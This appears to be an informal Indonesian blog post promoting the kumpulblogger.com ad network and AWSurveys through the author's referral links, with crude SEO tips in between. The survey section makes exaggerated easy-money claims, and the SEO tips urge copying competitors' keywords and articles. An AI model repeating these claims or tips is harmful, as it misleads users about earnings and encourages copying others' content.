Kembali ke http://kumpulblogger.com, selanjutnya anda lakukan login dengan email sebagai user dan kode/password dari email sebagai password anda (kotak login ada disebelah kanan atas). setelah selesai, klik tombol login yang berwarna hijau.
Setelah berada di halaman acount anda, silahkan anda coba satu persatu menu yang terdapat di sebelah kiri.
Klik menu tambah blog untuk mendaftarkan blog anda. Isi data-data yang disediakan dengan data blog anda
Klik menu Script Text Advertising untuk Blog anda, kemudian copy kodenya dan letakan pada blog anda. Bentuk tampilannya akan seperti ini. Coba anda klik salah satu link pada klom dibawah ini.
Klik menu Script Mini Banner untuk Blog anda, kemudian copy kodenya dan simpan pada blog anda. Penampilannya seperti ini
Lakukan hal yang sama pada menu-menu lainnya
Selamat mencoba..semoga bermanfaat...!!

Link Refferal Anda adalah : http://Kumpulblogger.com/signup.php?refid=69320

Anda dapat mengajak teman-teman anda untuk mendaftarkan juga ke kumpulblogger.com, Apabila mereka bergabung atas rekomendasi anda, maka setiap 1 kali klik dari pengunjung blog mereka, Anda akan mendapatkan 25 Rupiah.
Refferal hanya berlaku untuk level satu saja.

http://Kumpulblogger.com/signup.php?refid=69320

Promosikan dan Gunakan URL tersebut untuk memperbanyak anggota kumpulblogger.com yang tergabung dibawah rekomendasi anda.

Bagaimana Cara Mendapatkan Peringkat di Search Engine???

Ranking website di search engine yang tinggi boleh dikatakan jadi jaminan tingginya traffic ke website tersebut. Semakin banyak pengunjung berarti semakin banyak peluang kita mendapatkan keuntungan dari produk yang kita tawarkan di website kita. Banyak orang yang bingung bagaimana caranya meraih Ranking Di Search Engine. Ada yang membeli software berharga jutaan rupiah, ada pula yang menyewa perusahaan SEO dengan dana jutaan pula. Sebenarnya ada cara sederhana dan instan yang bisa digunakan tanpa perlu modal besar.

yuuk ikuti langkah-langkahnya...

1. Browsing ke search engine besar yaitu Google dan Yahoo saja, yang lain tidak perlu, dengan mengetikkan kata yang sesuai dengan produk/layanan website anda. Misalnya isi website anda mengenai bisnis online, ketikkan bisnis+online. Sebentar kemudian akan muncul sederet link website pesaing anda yang memiliki keyword bisnis online tersebut.

2. Catat lima website yang muncul teratas dari deretan itu dan kunjungilah tiap website tersebut.

3. Dari tiap website, lihat source kodenya. Misalnya anda pakai Internet Explorer, klik menu View di kiri atas dan pilih Source. Dari source kode tersebut lihat dan simpan keyword yang mereka gunakan.

4. Edit header website Anda. Copy sebagian (atau semua? ) keyword tersebut ke header website Anda. Sekarang keyword website Anda sudah sama atau hampir sama dengan lima website pesaing anda yang lebih dulu sudah memiliki ranking top.

5. Daftarkan kembali website anda ke search engine terutama Google dan Yahoo. Setiap saat search engine mendata website dengan keywod bisnis online, maka website anda akan terkatrol naik. Tapi tunggu dulu. Jangan buru-buru berpuas diri. Apa gunanya keyword bagus kalau layanan yang anda berikan tidak dapat mengimbangi pesaing anda. Jadi lakukan langkah berikut.

6. Kunjungi website pesaing anda dan pelajari apa keunggulan mereka yang tidak anda miliki. Lihat isi konten mereka. Copy artikel-artikel mereka yang tinggi hitsnya ke website anda, tentunya dengan tetap mencantumkan sumbernya. Mungkin website pesaing anda menawarkan download gratis satu sample ebook. Contohlah dan berikan layanan serupa di website anda, kalau bisa dengan kualitas lebih baik dari saingan anda, umpamanya bisa download ebook bukan versi sample tapi full version, dan bukan cuma satu tetapi 5 sekaligus!

7. Bergabunglah menjadi member, mendaftar di forum dan mengikuti layanan newsletter di website pesaing anda. Dengan demikian anda akan selalu mengetahui setiap kali pesaing anda melakukan update atau meluncurkan produk baru. Anda juga jadi tahu trend atau segmentasi konsumen mereka yang adalah setipe dengan calon konsumen anda. Anda tinggal mengikuti.

8. Bila website pesaing anda menyediakan ruang iklan, pasang iklan website Anda.

dan saya sudah membuktikanya liat contoh gambar di bawah ini...!

blog saya berada pada urutan ke 2

cara datap 27 dollar dalam 7 menit di awsurveys

1. Post sebelumnya telah saya jabarkan dengan title “RAPIDSHARE ACCOUNT GRATIS” , sebenarnya dalam pengumpulan dollar pada bisa juga kita jadikan mesin uang, ( Lha emg Bisa…???? )…Jawabnya YA IYA LAH…KNAPA NGGAK !!! .
2. Mungkin rekan-rekan nggak percaya atau masih bingung bagaimana caranya, nich aku coba jelasin cara untuk mendapatkan dollar gratis…. “BKAN SULAP BUKAN SIHIR…”klik aja ,or copy paste link dibawah ini

http://www.AWSurveys.com/HomeMain.cfm?RefID=hacker-arif

1. Isi form yang telah disediakan, secara otomatis anda akan mendapatkan 6 $ (DOLLAR), percaya ato nggak tapi emang itu buktinya.
2. Kemudian ikuti kuis yang disediakan, hanya memberi komentar aja antara dua situs dalam bahasa inggris. (gak susah kok, lagian gak betul2 amat juga dapat duit)
3. Setelah semua kuis anda ikutin, maka total dollar yang diperoleh kurang lebih 27 $ Dollar lah. (hitung aja ke Rp).
4. Tapi usaha belum selesai, karena untuk mencairkan DOLLAR kita ke PayPal minimal 75 $.
5. Usaha lain untuk menambah DOLLAR kita, pilih “REFER YOUR FRIEND” karena satu teman daftar melalui referal kita maka kita akan mendapatkan 1,25 $, lumayankan….Makanya kasi link ke temen yang banyak…
6. Nah setelah DOLLAR kita sampai pada nilai 75 $, kita bisa klik “REEDEM MONEY” untuk memasukkan account kita ke PayPal.
7. Lebih untung lagi di indonesia sudah ada PayPal Indonesia, ini address nya : http://www.paypalindonesia.com
8. Dengan fasilitas Withdraw, tu DOLLAR bisa kita cairkan ke Bank yang kita punya (alias bank lokal Indonesia), Asik kan?
9. Langkah terakhir, ya buruan daftar…..BIAR DAPAT UANG GRATISS…….

klik DI SINI (Klik) untuk daftar...!

klo ada pertanyaan silahkan hubungi ym saya di retro_skater_boys